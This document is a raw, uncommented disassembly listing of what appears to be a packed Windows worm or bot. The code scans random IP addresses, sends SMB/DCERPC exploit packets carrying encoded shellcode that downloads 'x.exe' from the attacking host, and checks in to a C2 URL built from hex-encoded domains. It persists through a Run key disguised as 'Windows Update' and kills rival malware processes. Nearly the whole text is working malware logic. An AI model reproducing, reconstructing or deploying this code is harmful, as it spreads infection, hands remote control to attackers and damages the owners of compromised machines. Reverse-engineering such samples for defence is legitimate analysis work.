pop ebx
loc_31602613: ; CODE XREF: sub_3160258F+C�j
pop ebp
retn 4
sub_3160258F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31602617 proc near ; DATA XREF: UPX0:316027E7�o
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
call sub_31601ED5
call sub_31602378
test eax, eax
jnz loc_316026D0
push ebx
mov ebx, dword_31601094
push esi
mov esi, dword_316010FC
push edi
loc_3160263D: ; CODE XREF: sub_31602617+48�j
; sub_31602617+B0�j
call esi ; rand
mov byte ptr [ebp+var_4+1], al
call esi ; rand
mov byte ptr [ebp+var_4+3], al
call esi ; rand
mov byte ptr [ebp+var_4+2], al
loc_3160264C: ; CODE XREF: sub_31602617+3C�j
call esi ; rand
cmp al, 7Fh
mov byte ptr [ebp+var_4], al
jz short loc_3160264C
call sub_31601FD3
mov edi, [ebp+var_4]
cmp edi, eax
jz short loc_3160263D
call sub_31602012
test eax, eax
jz short loc_316026A8
push offset dword_31604FE4
call dword_316010D4 ; InterlockedIncrement
push edi
call sub_316017DB
test eax, eax
pop ecx
jnz short loc_316026AF
push edi
push offset sub_3160252B
call sub_31601F2C
pop ecx
mov [ebp+var_8], 4
pop ecx
loc_31602694: ; CODE XREF: sub_31602617+8D�j
push edi
push offset sub_3160258F
call sub_31601F2C
dec [ebp+var_8]
pop ecx
pop ecx
jnz short loc_31602694
jmp short loc_316026AF
; ---------------------------------------------------------------------------
loc_316026A8: ; CODE XREF: sub_31602617+51�j
push 2710h
call ebx ; Sleep
loc_316026AF: ; CODE XREF: sub_31602617+67�j
; sub_31602617+8F�j
movzx edi, word_31604FEC
call esi ; rand
cdq
idiv edi
add edx, edi
push edx
call ebx ; Sleep
call sub_31602378
test eax, eax
jz loc_3160263D
pop edi
pop esi
pop ebx
loc_316026D0: ; CODE XREF: sub_31602617+11�j
push 0
call dword_316010D0 ; ExitThread
xor eax, eax
leave
retn 4
sub_31602617 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_316026DE proc near ; CODE XREF: UPX0:316027AC�p
; UPX0:loc_31602812�p
var_50 = byte ptr -50h
var_28 = byte ptr -28h
push ebp
mov ebp, esp
sub esp, 50h
push esi
call sub_31601FD3
push eax
call dword_3160115C ; inet_ntoa
mov esi, dword_31601068
push eax
lea eax, [ebp+var_28]
push eax
call esi ; lstrcpy
push dword_31604FDC
lea eax, [ebp+var_28]
push eax
lea eax, [ebp+var_50]
push offset aHttpSDX_exe ; "http://%s:%d/x.exe"
push eax
call dword_3160111C ; wsprintfA
add esp, 10h
lea eax, [ebp+var_50]
push eax
push offset word_316042BA
call esi ; lstrcpy
push offset byte_316042B8
call dword_31601084 ; lstrlen
mov byte_316042B8[eax], 0DFh
pop esi
leave
retn
sub_316026DE endp
; ---------------------------------------------------------------------------
loc_3160273A: ; DATA XREF: sub_3160238C+158�o
push ecx
push ecx
push ebx
push ebp
push esi
xor ebx, ebx
push edi
mov dword_31604FE4, ebx
call sub_31602012
mov esi, dword_31601094
mov edi, 1388h
test eax, eax
jnz short loc_31602768
loc_3160275C: ; CODE XREF: UPX0:31602766�j
push edi
call esi ; Sleep
call sub_31602012
test eax, eax
jz short loc_3160275C
loc_31602768: ; CODE XREF: UPX0:3160275A�j
lea eax, [esp+14h]
push ebx
push eax
call dword_31601130 ; InternetGetConnectedState
test byte ptr [esp+14h], 2
push 50h
mov dword_31604FE8, ebx
pop ebp
mov word_31604FEC, 96h
jz short loc_316027A5
mov dword_31604FE8, 1
mov ebp, 15Eh
mov word_31604FEC, 14h
loc_316027A5: ; CODE XREF: UPX0:3160278B�j
call sub_31601FD3
mov ebx, eax
call sub_316026DE
cmp ebx, 100007Fh
jz short loc_316027C6
push ebx
push offset sub_3160252B
call sub_31601F2C
pop ecx
pop ecx
loc_316027C6: ; CODE XREF: UPX0:316027B7�j
mov dword ptr [esp+10h], 4
loc_316027CE: ; CODE XREF: UPX0:316027DF�j
push ebx
push offset sub_3160258F
call sub_31601F2C
dec dword ptr [esp+18h]
pop ecx
pop ecx
jnz short loc_316027CE
test ebp, ebp
jle short loc_316027F6
loc_316027E5: ; CODE XREF: UPX0:316027F4�j
push 0
push offset sub_31602617
call sub_31601F2C
pop ecx
dec ebp
pop ecx
jnz short loc_316027E5
loc_316027F6: ; CODE XREF: UPX0:316027E3�j
; UPX0:31602802�j ...
call sub_31602012
test eax, eax
jz short loc_31602804
push edi
call esi ; Sleep
jmp short loc_316027F6
; ---------------------------------------------------------------------------
loc_31602804: ; CODE XREF: UPX0:316027FD�j
; UPX0:31602810�j
call sub_31602012
test eax, eax
jnz short loc_31602812
push edi
call esi ; Sleep
jmp short loc_31602804
; ---------------------------------------------------------------------------
loc_31602812: ; CODE XREF: UPX0:3160280B�j
call sub_316026DE
jmp short loc_316027F6
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31602819 proc near ; CODE XREF: sub_316029B2+8C�p
; sub_31602B2C+11A�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
push 0F003Fh
push 0
push [ebp+arg_4]
push [ebp+arg_0]
call dword_3160100C ; RegOpenKeyExA
test eax, eax
jnz short loc_3160284C
push [ebp+arg_8]
push [ebp+arg_4]
call dword_31601010 ; RegDeleteValueA
push [ebp+arg_4]
call dword_31601014 ; RegCloseKey
loc_3160284C: ; CODE XREF: sub_31602819+1C�j
pop ebp
retn
sub_31602819 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3160284E proc near ; CODE XREF: sub_3160219E+33�p
; sub_316029B2+7D�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_10]
push esi
mov [ebp+var_4], eax
lea eax, [ebp+arg_10]
push eax
xor esi, esi
push 0F003Fh
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_3160100C ; RegOpenKeyExA
test eax, eax
jz short loc_3160287A
push 1
pop eax
jmp short loc_316028A4
; ---------------------------------------------------------------------------
loc_3160287A: ; CODE XREF: sub_3160284E+25�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+arg_4]
push [ebp+arg_C]
push eax
push esi
push [ebp+arg_8]
push [ebp+arg_10]
call dword_31601008 ; RegQueryValueExA
test eax, eax
jz short loc_31602899
push 2
pop esi
loc_31602899: ; CODE XREF: sub_3160284E+46�j
push [ebp+arg_10]
call dword_31601014 ; RegCloseKey
mov eax, esi
loc_316028A4: ; CODE XREF: sub_3160284E+2A�j
pop esi
leave
retn
sub_3160284E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_316028A7 proc near ; CODE XREF: sub_31602A60+96�p
; sub_31602B2C+7C�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push esi
xor esi, esi
lea eax, [ebp+arg_4]
push esi
push eax
push esi
push 0F003Fh
push esi
push esi
push esi
push [ebp+arg_4]
push [ebp+arg_0]
call dword_31601000 ; RegCreateKeyExA
test eax, eax
jz short loc_316028D0
push 1
pop eax
jmp short loc_316028F7
; ---------------------------------------------------------------------------
loc_316028D0: ; CODE XREF: sub_316028A7+22�j
push [ebp+arg_10]
push [ebp+arg_C]
push 1
push esi
push [ebp+arg_8]
push [ebp+arg_4]
call dword_31601004 ; RegSetValueExA
test eax, eax
jz short loc_316028EC
push 2
pop esi
loc_316028EC: ; CODE XREF: sub_316028A7+40�j
push [ebp+arg_4]
call dword_31601014 ; RegCloseKey
mov eax, esi
loc_316028F7: ; CODE XREF: sub_316028A7+27�j
pop esi
pop ebp
retn
sub_316028A7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_316028FA proc near ; CODE XREF: sub_316029B2+98�p
var_128 = dword ptr -128h
var_120 = dword ptr -120h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 128h
push ebx
mov ebx, [ebp+arg_0]
push esi
push ebx
call dword_31601084 ; lstrlen
mov esi, eax
dec esi
test esi, esi
jle loc_316029AE
loc_3160291A: ; CODE XREF: sub_316028FA+27�j
cmp byte ptr [esi+ebx], 5Ch
jz short loc_31602923
dec esi
jns short loc_3160291A
loc_31602923: ; CODE XREF: sub_316028FA+24�j
push 0
push 2
call sub_31602CEC ; CreateToolhelp32Snapshot
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz short loc_316029AE
push 128h
lea eax, [ebp+var_128]
push 0
push eax
call sub_31602C96 ; memset
add esp, 0Ch
lea eax, [ebp+var_128]
mov [ebp+var_128], 128h
push eax
push [ebp+arg_0]
call sub_31602CE6 ; Process32First
test eax, eax
jz short loc_316029AE
lea esi, [esi+ebx+1]
loc_3160296B: ; CODE XREF: sub_316028FA+B2�j
lea eax, [ebp+var_104]
push eax
push esi
call dword_31601104 ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_3160299B
push [ebp+var_120]
push 0
push 1F0FFFh
call dword_316010B0 ; OpenProcess
push 0
push eax
call dword_31601060 ; TerminateProcess
loc_3160299B: ; CODE XREF: sub_316028FA+83�j
lea eax, [ebp+var_128]
push eax
push [ebp+arg_0]
call sub_31602CE0 ; Process32Next
test eax, eax
jnz short loc_3160296B
loc_316029AE: ; CODE XREF: sub_316028FA+1A�j
; sub_316028FA+38�j ...
pop esi
pop ebx
leave
retn
sub_316028FA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_316029B2 proc near ; CODE XREF: UPX0:31602355�p
var_138 = byte ptr -138h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 138h
push ebx
push esi
lea eax, [ebp+var_30]
push edi
mov [ebp+var_30], offset aWindowsSecurit ; "Windows Security Manager"
mov [ebp+var_2C], offset aDiskDefragment ; "Disk Defragmenter"
mov [ebp+var_28], offset aSystemRestoreS ; "System Restore Service"
mov [ebp+var_24], offset aBotLoader ; "Bot Loader"
mov [ebp+var_20], offset aSystray ; "SysTray"
mov [ebp+var_1C], offset aWinupdate ; "WinUpdate"
mov [ebp+var_18], offset aWindowsUpdateS ; "Windows Update Service"
mov [ebp+var_14], offset aAvserve_exe ; "avserve.exe"
mov [ebp+var_10], offset aAvserve2_exeup ; "avserve2.exeUpdate Service"
mov [ebp+var_C], offset aMsConfigV13 ; "MS Config v13"
mov [ebp+var_4], eax
mov [ebp+var_8], 0Ah
mov edi, offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
mov esi, 80000002h
loc_31602A1B: ; CODE XREF: sub_316029B2+A7�j
mov eax, [ebp+var_4]
push 104h
mov ebx, [eax]
lea eax, [ebp+var_138]
push eax
push ebx
push edi
push esi
call sub_3160284E
add esp, 14h
test eax, eax
jnz short loc_31602A52
push ebx
push edi
push esi
call sub_31602819
lea eax, [ebp+var_138]
push eax
call sub_316028FA
add esp, 10h
loc_31602A52: ; CODE XREF: sub_316029B2+87�j
add [ebp+var_4], 4
dec [ebp+var_8]
jnz short loc_31602A1B
pop edi
pop esi
pop ebx
leave
retn
sub_316029B2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31602A60 proc near ; CODE XREF: sub_31602B2C+D1�p
; sub_31602B2C+132�p
var_78 = byte ptr -78h
var_14 = byte ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 78h
cmp [ebp+arg_0], 0
jz short loc_31602A75
push [ebp+arg_0]
call dword_31601074 ; DeleteFileA
loc_31602A75: ; CODE XREF: sub_31602A60+A�j
lea eax, [ebp+var_78]
push 63h
push eax
call dword_3160108C ; GetSystemDirectoryA
test eax, eax
jz locret_31602B2A
push esi
call dword_316010FC ; rand
and eax, 3
add eax, 5
push eax
lea eax, [ebp+var_14]
push eax
call sub_31601F4D
mov esi, dword_31601088
pop ecx
pop ecx
lea eax, [ebp+var_14]
push offset dword_316041F0
push eax
call esi ; lstrcat
lea eax, [ebp+var_78]
push offset dword_316041F8
push eax
call esi ; lstrcat
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_78]
push eax
call esi ; lstrcat
lea eax, [ebp+var_78]
push 0
push eax
push [ebp+arg_4]
call dword_31601050 ; CopyFileA
lea eax, [ebp+var_78]
push eax
call dword_31601084 ; lstrlen
inc eax
push eax
lea eax, [ebp+var_78]
push eax
push offset aWindowsUpdate ; "Windows Update"
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call sub_316028A7
add esp, 14h
push dword_31604FD4
call dword_3160107C ; CloseHandle
lea eax, [ebp+var_78]
push 0
push eax
call dword_31601054 ; WinExec
push 1F4h
call dword_31601094 ; Sleep
push 0
call dword_316010E0 ; ExitProcess
pop esi
locret_31602B2A: ; CODE XREF: sub_31602A60+23�j
leave
retn
sub_31602A60 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31602B2C proc near ; CODE XREF: UPX0:3160235A�p
var_E8 = byte ptr -0E8h
var_84 = byte ptr -84h
var_20 = byte ptr -20h
push ebp
mov ebp, esp
sub esp, 0E8h
push ebx
push esi
push edi
lea eax, [ebp+var_84]
push 63h
push eax
push 0
call dword_31601048 ; GetModuleFileNameA
test eax, eax
jz loc_31602C65
and dword_31604FF0, 0
lea eax, [ebp+var_20]
push 1Dh
push eax
mov edi, offset aSoftwareMicr_0 ; "Software\\Microsoft\\Wireless"
push offset aId ; "ID"
mov esi, 80000002h
push edi
push esi
call sub_3160284E
add esp, 14h
test eax, eax
jz short loc_31602BB2
call dword_316010FC ; rand
push 0Ah
mov ebx, offset aPiatvxkotmgvos ; "piatvxkotmgvosdrr"
cdq
pop ecx
idiv ecx
add edx, ecx
push edx
push ebx
call sub_31601F4D
pop ecx
pop ecx
push ebx
call dword_31601084 ; lstrlen
inc eax
push eax
push ebx
push offset aId ; "ID"
push edi
push esi
call sub_316028A7
add esp, 14h
jmp short loc_31602BC1
; ---------------------------------------------------------------------------
loc_31602BB2: ; CODE XREF: sub_31602B2C+4D�j
lea eax, [ebp+var_20]
push eax
push offset aPiatvxkotmgvos ; "piatvxkotmgvosdrr"
call dword_31601068 ; lstrcpy
loc_31602BC1: ; CODE XREF: sub_31602B2C+84�j
lea eax, [ebp+var_E8]
push 63h
push eax
push offset aWindowsUpdate ; "Windows Update"
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push esi
call sub_3160284E
add esp, 14h
test eax, eax
jz short loc_31602C07
push 2
push offset a1 ; "1"
push offset aClient ; "Client"
push edi
push esi
call sub_316028A7
lea eax, [ebp+var_84]
push eax
push 0
call sub_31602A60
add esp, 1Ch
jmp short loc_31602C65
; ---------------------------------------------------------------------------
loc_31602C07: ; CODE XREF: sub_31602B2C+B3�j
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_E8]
push eax
call dword_3160104C ; lstrcmpi
test eax, eax
jnz short loc_31602C50
lea eax, [ebp+var_20]
push 1Dh
mov ebx, offset aClient ; "Client"
push eax
push ebx
push edi
push esi
call sub_3160284E
add esp, 14h
test eax, eax
jnz short loc_31602C65
push ebx
push edi
push esi
mov dword_31604FF0, 1
call sub_31602819
add esp, 0Ch
jmp short loc_31602C65
; ---------------------------------------------------------------------------
loc_31602C50: ; CODE XREF: sub_31602B2C+F1�j
lea eax, [ebp+var_84]
push eax
lea eax, [ebp+var_E8]
push eax
call sub_31602A60
pop ecx
pop ecx
loc_31602C65: ; CODE XREF: sub_31602B2C+1F�j
; sub_31602B2C+D9�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_31602B2C endp
; =============== S U B R O U T I N E =======================================
sub_31602C6A proc near ; CODE XREF: sub_316011A0+CA�p
; sub_316015C7+11�p ...
arg_0 = dword ptr 4
push 4
push 1000h
push [esp+8+arg_0]
push 0
call dword_31601044 ; VirtualAlloc
retn
sub_31602C6A endp
; =============== S U B R O U T I N E =======================================
sub_31602C7E proc near ; CODE XREF: sub_316011A0+10B�p
; sub_316015C7+BD�p
arg_0 = dword ptr 4
push 8000h
push 0
push [esp+8+arg_0]
call dword_31601040 ; VirtualFree
retn
sub_31602C7E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31602C90 proc near ; DATA XREF: sub_31601422+A�o
; sub_3160238C+A�o
jmp dword_31601100
sub_31602C90 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31602C96 proc near ; CODE XREF: sub_316017DB+128�p
; sub_316017DB+134�p ...
jmp dword_316010F8
sub_31602C96 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31602C9C proc near ; CODE XREF: sub_316017DB+9C�p
; sub_316017DB+C5�p ...
jmp dword_316010F4
sub_31602C9C endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31602CA2 proc near ; CODE XREF: sub_316017DB+93�p
; sub_316017DB+B2�p ...
jmp dword_316010F0
sub_31602CA2 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_31602CB0 proc near ; CODE XREF: sub_316017DB+8�p
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_31602CD0
loc_31602CBC: ; CODE XREF: sub_31602CB0+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_31602CBC
loc_31602CD0: ; CODE XREF: sub_31602CB0+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_31602CB0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31602CE0 proc near ; CODE XREF: sub_316028FA+AB�p
jmp dword_31601064
sub_31602CE0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31602CE6 proc near ; CODE XREF: sub_316028FA+64�p
jmp dword_3160105C
sub_31602CE6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_31602CEC proc near ; CODE XREF: sub_316028FA+2D�p
jmp dword_31601058
sub_31602CEC endp
; ---------------------------------------------------------------------------
db 2 dup(0CCh)
dd 4C3h dup(0)
dword_31604000 dd 206h, 2400h, 31415352h, 180h, 10001h, 11838DF5h, 2AEC5279h
; DATA XREF: sub_31601422+112�o
dd 0E7F63AE4h, 0E0EA9B49h, 0DB21AFBEh, 1A95447Eh, 0A032615Eh
dd 9F6A1F85h, 3994FF94h, 8F26A684h, 5C1DCE35h, 0B20BC9A5h
dd 3072657Ah, 0
aMozilla4_0Co_0 db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0
; DATA XREF: sub_316015C7+84�o
align 10h
byte_31604080 db 0 ; DATA XREF: sub_3160169C+15�r
off_31604081 dd offset dword_316041E4 ; DATA XREF: sub_3160169C+1D�r
align 2
dd offset dword_316041D4
dw 0C401h
dd 1316041h, 316041B4h, 6041A000h, 41900131h, 80013160h
dd 316041h, 31604174h, 60416800h, 41580131h, 48003160h
dd 1316041h, 3160413Ch, 60417400h, 41D40131h, 30003160h
dd 316041h, 316041D4h, 60412001h, 41480031h, 10013160h
dd 316041h, 31604130h, 60410001h, 40F80131h, 74003160h
dd 316041h, 31604130h, 2E767663h, 7572h, 2E777777h, 6C646572h
dd 2E656E69h, 7572h, 656C6966h, 72616573h, 722E6863h, 75h
dd 6F626F72h, 61686378h, 2E65676Eh, 6D6F63h, 68746566h
dd 2E647261h, 7A6962h, 63657361h, 2E616B68h, 7572h, 7473616Dh
dd 782D7265h, 6D6F632Eh, 0
dd 6F6C6F63h, 61622D72h, 722E6B6Eh, 75h, 6B76616Bh, 742E7A61h
dd 76h, 74757263h, 6E2E706Fh, 75h, 6F64696Bh, 61622D73h
dd 722E6B6Eh, 75h, 65726170h, 61622D78h, 722E6B6Eh, 75h
dd 6C756461h, 6D652D74h, 65726970h, 6D6F632Eh, 0
dd 666E6F6Bh, 616B7369h, 726F2E74h, 67h, 69746963h, 6E61622Dh
dd 75722E6Bh, 0
dword_316041D4 dd 72617778h, 6A632E65h, 656E2E62h, 74h ; DATA XREF: UPX0:31604086�o
dword_316041E4 dd 617A616Dh, 616B6166h, 75722Eh ; DATA XREF: UPX0:off_31604081�o
dword_316041F0 dd 6578652Eh, 0 ; DATA XREF: sub_316011A0+75�o
; sub_31602058+55�o ...
dword_316041F8 dd 5Ch ; DATA XREF: sub_316011A0+49�o
; sub_31602A60+56�o
aMozilla4_0Comp db 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',0
; DATA XREF: sub_316011A0+13�o
align 10h
aAbcdefghijkl_0 db 'abcdefghijklmnopqrstuvwxyz',0 ; DATA XREF: sub_31601316+1C�o
align 4
aAbcdefghijklmn db 'ABCDEFGHIJKLMNOPQRSTUVWXYZ',0 ; DATA XREF: sub_31601316+C�o
align 4
aZer0 db 'zer0',0 ; DATA XREF: sub_31601422+34�o
align 10h
aHttpS db 'http://%s',0 ; DATA XREF: sub_316015C7+71�o
align 4
aHttpSIndex_php db 'http://%s/index.php?id=%s&scn=%d&inf=%d&ver=18&cnt=%s',0
; DATA XREF: sub_316015C7+57�o
align 8
byte_316042B8 db 0EBh ; DATA XREF: sub_316017DB+24E�o
; sub_316017DB+260�o ...
db 58h
word_316042BA dw 7468h ; DATA XREF: sub_316026DE+40�o
dd 2F3A7074h, 3732312Fh, 302E302Eh, 383A312Eh, 652F3030h
dd 6578652Eh, 4 dup(0DFDFDFDFh), 7A6F4DDFh, 616C6C69h
dd 302E342Fh, 0C9335DDFh, 1EEB966h, 8B05758Dh, 3C068AFEh
dd 46057599h, 302C068Ah, 88993446h, 0EDE24707h, 0DAE80AEBh
dd 2EFFFFFFh, 2E676562h, 0C9999371h, 0C999C999h, 91BDFD12h
dd 0C99916FDh, 0AA6872C1h, 0AA66FD42h, 14BA10FDh, 9998A91Ch
dd 0C9C999C9h, 98F198F3h, 9986C999h, 98C071C9h, 0C999C999h
dd 37CB5F90h, 1C965992h, 99C99978h, 14C999C9h, 7D7157E4h
dd 0C999C999h, 0E414C999h, 9945713Ah, 99C999C9h, 0F19DF3C9h
dd 9989C999h, 0F1C999C9h, 0C999C999h, 0F3C9999Ch, 0B371C999h
dd 99C99998h, 0E3F367C9h, 0DC1C10F0h, 99C99998h, 0C959B2C9h
dd 0C99BF3C9h, 0C999F1C9h, 0C999C999h, 0A10414D9h, 99C99998h
dd 9E71CAC9h, 99C99998h, 61688DC9h, 0AD1C1091h, 99C99998h
dd 66611AC9h, 99111D96h, 99C999C9h, 0C850B2C9h, 98F3C8C8h
dd 0C957DC14h, 0C9992571h, 0C999C999h, 91C0A44Eh, 59924912h
dd 59B2F7EDh, 0C9C9C9C9h, 0CA3AC414h, 993B71CBh, 99C999C9h
dd 0E424FFC9h, 0ED599221h, 0F1CDCDCFh, 0C999C999h, 66C9999Ch
dd 9998DC2Ch, 0C9C999C9h, 0C9991E71h, 0C999C999h, 83B8B0FBh
dd 5D12CDC3h, 0C9C999F3h, 0DC2C66CBh, 99C99998h, 0AD2C66C9h
dd 99C99998h, 990B71C9h, 99C999C9h, 0A6485AC9h, 2C66C096h
dd 0C99998ADh, 1B71C999h, 0C999C999h, 294CC999h, 9CF3EBA7h
dd 98A10414h, 0C999C999h, 99E971CAh, 99C999C9h, 26F434C9h
dd 0C999F371h, 0C999FC71h, 0C999C999h, 0EF133BF9h, 376B4629h
dd 9966DE5Fh, 0A8EC5AC9h, 99C999A1h, 99C999C9h, 0B7C999C9h
dd 0E9EDFFC5h, 0B7FDE9ECh, 99FCE1FCh, 6 dup(99C999C9h)
dd 0FCF5CAC9h, 0C999E9FCh, 0F7EBFCF2h, 0ABAAF5FCh, 34C7C999h
dd 0B459AAF9h, 662A2A25h, 9093ACC9h, 9CC9B781h, 83639D90h
dd 9271CDC9h, 0C999C999h, 19BFC999h, 0FD145135h, 720A95BDh
dd 0F934C791h, 0C999C871h, 0C999C999h, 12A5D212h, 9AE180D5h
dd 146FAA52h, 0C89A2A8Dh, 9A8B12B9h, 5859AA4Ah, 9BAB9E59h
dd 99A319DBh, 0A26CECC9h, 0ED85BDDDh, 0E8A2DF9Eh, 5544EB81h
dd 9ABDC812h, 8D2E964Ah, 85D812EBh, 9D125A9Ah, 105A9A09h
dd 0F885BDDDh, 98D01C10h, 0C999C999h, 7F664966h, 8712FEFDh
dd 12C999A9h, 0C21295C2h, 12821285h, 0B75A91C2h, 0B7FDF7FCh
dd 0
dword_31604580 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: sub_316017DB+186�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_3160460C dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_316017DB+1BA�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 8
dword_316046B8 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_316017DB+1EE�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_31604798 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_316017DB+8D�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC: ; DATA XREF: sub_316017DB+BF�o
unicode 0, <C$>,0
a????? db '?????',0
dd 0
dword_316047FC dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_316017DB+2D4�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 0
dword_31604868 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_316017DB+308�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dword_3160490C dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_316017DB+4EE�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
dword_3160498C dd 401495h, 3, 40707Ch, 1, 0 ; DATA XREF: sub_316017DB+51C�o
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 40707Ch, 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 0
dword_31604A20 dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_316017DB+347�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 0
dword_31604A8C dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_316017DB+372�o
